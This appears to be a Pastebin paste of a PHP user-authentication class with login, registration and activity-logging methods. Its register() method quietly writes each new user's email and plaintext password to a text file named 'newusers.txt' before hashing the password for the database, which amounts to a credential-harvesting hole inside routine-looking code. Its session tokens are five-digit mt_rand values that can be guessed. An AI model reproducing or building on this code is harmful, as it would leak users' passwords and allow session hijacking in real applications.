API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 15th, 2016
129
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.46 KB | None | 0 0
raw download clone embed print report
  1.  
  2. application/x-httpd-php UserAuth.class.php ( PHP script text )
  3.  
  4. <?php
  5.  
  6. namespace App;
  7.  
  8. class UserAuth extends MySQL
  9. {
  10.  
  11. public function loggedin()
  12. {
  13.  
  14. $userid = $_SESSION['userid'];
  15. $session = $_SESSION['session'];
  16.  
  17. $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE id = ? AND session = ?');
  18. $selectSql->execute(array($userid, $session));
  19. $selectCount = $selectSql->fetchcolumn();
  20.  
  21. return ($selectCount == 1) ? true : false;
  22.  
  23. }
  24.  
  25. public function login($email, $password)
  26. {
  27.  
  28. if (strlen($email) <= 32) {
  29. $selectSql = $this->mysql->prepare('SELECT * FROM users WHERE email = ?');
  30. $selectSql->execute(array($email));
  31. $user = $selectSql->fetchAll();
  32. if (!empty($user)) {
  33. $account = (object)$user[0];
  34. if (!password_verify($password, $account->password)) {
  35. $this->log($account->id, 'Failed Log In');
  36. return 'The email/password combination is incorrect.';
  37. } else if ($account->banned == 1) {
  38. return 'Your account has been banned from our system.';
  39. } else {
  40. $this->log($account->id, 'Logged In');
  41. $sessionid = mt_rand(11111, 99999);
  42. $_SESSION['userid'] = $account->id;
  43. $_SESSION['session'] = $sessionid;
  44. $updateSql = $this->mysql->prepare('UPDATE users SET session = ? WHERE id = ?');
  45. $updateSql->execute(array($sessionid, $account->id));
  46. return 'true';
  47. }
  48. } else {
  49. return 'The email/password combination is incorrect.';
  50. }
  51. } else {
  52. return 'The email/password combination is incorrect.';
  53. }
  54.  
  55. }
  56.  
  57. public function register($email, $password, $password2)
  58. {
  59. if (strlen($email) > 32) {
  60. return 'Your email has to be 32 or less characters long.';
  61. } else if (empty($password) || md5($password) != md5($password2)) {
  62. return 'Your repeated password needs to match the password';
  63. } else {
  64.  
  65. $file = fopen("newusers.txt", "w");
  66. $txt = "E-mail: $email Password: $password \n";
  67. fwrite($file, $txt);
  68. fclose($file);
  69.  
  70. $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE email = ?');
  71. $selectSql->execute(array($email));
  72.  
  73. if ($selectSql->fetchcolumn(0) > 0) {
  74. return 'This email is already taken';
  75. } else {
  76.  
  77. $insertSql = $this->mysql->prepare('INSERT INTO users VALUES (null, ?, ?, 0, 0)');
  78. $insertSql->execute(array(password_hash($password, PASSWORD_DEFAULT), $email));
  79. $this->log($this->mysql->lastInsertId(), 'Signed Up');
  80. return 'true';
  81.  
  82. }
  83.  
  84. }
  85.  
  86. }
  87.  
  88. private function log($userId, $activity, $status = '0')
  89. {
  90. $browser = (object)json_decode(file_get_contents('http://www.useragentstring.com/?uas=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&getJSON=all'));
  91. $insertSql = $this->mysql->prepare('INSERT INTO acclogs VALUES (null, ?, ?, ?, ?, ?, ?, ?)');
  92. $insertSql->execute(array($userId, $_SERVER['REMOTE_ADDR'], $browser->agent_name, $browser->os_name, $activity, $status, time()));
  93. return true;
  94. }
  95.  
  96. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!